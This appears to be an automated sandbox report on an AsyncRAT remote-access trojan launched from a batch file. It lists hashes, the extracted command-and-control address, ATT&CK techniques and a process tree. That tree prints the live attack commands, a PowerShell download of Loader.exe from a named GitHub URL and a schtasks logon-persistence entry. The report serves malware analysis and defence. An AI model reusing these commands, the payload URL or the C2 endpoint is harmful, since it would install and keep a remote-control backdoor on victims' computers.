asyncrat | 7a3fd30d774152069744411923370c4502a6d07847c7ac9377602741fb4c1859

General

Target

kids.bat
Size

368B
MD5

77e20cc9b8332536c63147d861cf554c
SHA1

b068597a13cc0dafc3de9d98595a0bf479b8227f
SHA256

7a3fd30d774152069744411923370c4502a6d07847c7ac9377602741fb4c1859
SHA512

4c639c81461fab44c2e66859798da1263ad228e463b7d260c226f812d56eddcd5b03c02d4ea10ac025803f2ef05d7a4d7fd06436c35636248770ad0ec91f0568

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Loader.exe	family_asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 2140 powershell.exe
9 2140 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2140 powershell.exe
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Loader.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Loader.exe
Executes dropped EXE 2 IoCs

Processes:

Loader.exeWINDOWS.exe

pid process

1100 Loader.exe
1364 WINDOWS.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3760 timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3960 schtasks.exe

flow	pid	process
7	2140	powershell.exe
9	2140	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Loader.exe

pid	process
1100	Loader.exe
1364	WINDOWS.exe

pid	process
3760	timeout.exe

pid	process
3960	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeLoader.exeWINDOWS.exe

pid	process
2140	powershell.exe
2140	powershell.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1100	Loader.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe
1364	WINDOWS.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeLoader.exeWINDOWS.exe

description	pid	process
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	1100	Loader.exe
Token: SeDebugPrivilege	1100	Loader.exe
Token: SeDebugPrivilege	1364	WINDOWS.exe
Token: SeDebugPrivilege	1364	WINDOWS.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

cmd.exeLoader.execmd.execmd.exe

description	pid	process	target process
PID 3996 wrote to memory of 2140	3996	cmd.exe	powershell.exe
PID 3996 wrote to memory of 2140	3996	cmd.exe	powershell.exe
PID 3996 wrote to memory of 1100	3996	cmd.exe	Loader.exe
PID 3996 wrote to memory of 1100	3996	cmd.exe	Loader.exe
PID 1100 wrote to memory of 4868	1100	Loader.exe	cmd.exe
PID 1100 wrote to memory of 4868	1100	Loader.exe	cmd.exe
PID 1100 wrote to memory of 1892	1100	Loader.exe	cmd.exe
PID 1100 wrote to memory of 1892	1100	Loader.exe	cmd.exe
PID 4868 wrote to memory of 3960	4868	cmd.exe	schtasks.exe
PID 4868 wrote to memory of 3960	4868	cmd.exe	schtasks.exe
PID 1892 wrote to memory of 3760	1892	cmd.exe	timeout.exe
PID 1892 wrote to memory of 3760	1892	cmd.exe	timeout.exe
PID 1892 wrote to memory of 1364	1892	cmd.exe	WINDOWS.exe
PID 1892 wrote to memory of 1364	1892	cmd.exe	WINDOWS.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\kids.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2140
- C:\Users\Admin\Desktop\Loader.exe
  C:\Users\Admin\Desktop\Loader.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1100
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9C6F.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3760
  - - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
      "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wk1k4hz4.bej.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9C6F.tmp.bat

Filesize
151B

MD5
e7040df49a1dbb75f0e942505c1790f8

SHA1
e270222c5c48ccb63df2a2a00c1131f162509f8a

SHA256
dd7218c9a74987b3a5698689db16daa8babd4af9372295b8ffe20bbacd147986

SHA512
b156c46e9d66629ef13c1251d68f9211ea7b92d75a0ca7cbf687c240bcdca411a229a95b5b15328b6005bc4b0c554dcf6232e1cedae86f5bd2e668bb40f00700

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
memory/1100-22-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

Filesize
10.8MB

Download
memory/1100-20-0x0000000000DD0000-0x0000000000DE6000-memory.dmp

Filesize
88KB

Download
memory/1100-21-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

Filesize
10.8MB

Download
memory/1100-27-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

Filesize
10.8MB

Download
memory/1100-28-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

Filesize
10.8MB

Download
memory/2140-12-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

Filesize
10.8MB

Download
memory/2140-16-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

Filesize
10.8MB

Download
memory/2140-11-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

Filesize
10.8MB

Download
memory/2140-0-0x00007FFD99B73000-0x00007FFD99B75000-memory.dmp

Filesize
8KB

Download
memory/2140-1-0x0000017074020000-0x0000017074042000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads